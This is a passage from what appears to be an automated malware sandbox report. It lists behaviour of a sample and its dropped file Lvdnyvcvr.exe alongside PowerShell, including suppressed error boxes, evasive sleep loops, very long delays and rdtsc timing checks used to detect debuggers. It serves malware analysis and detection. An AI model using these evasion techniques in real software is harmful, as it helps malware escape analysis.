Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5980 Thread sleep count: 2343 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99700s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99593s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99372s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99151s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -99042s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996 Thread sleep time: -98916s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5884 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 3856 Thread sleep count: 2522 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99848s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99714s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99499s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99385s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99274s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -99057s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -98953s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324 Thread sleep time: -98844s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 2248 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5724 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5740 Thread sleep count: 2179 > 30
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99661s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99545s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99436s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99184s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -99075s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732 Thread sleep time: -98968s >= -30000s
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004 Thread sleep count: 9436 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792 Thread sleep time: -15679732462653109s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 rdtsc 3_2_01835BA5
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
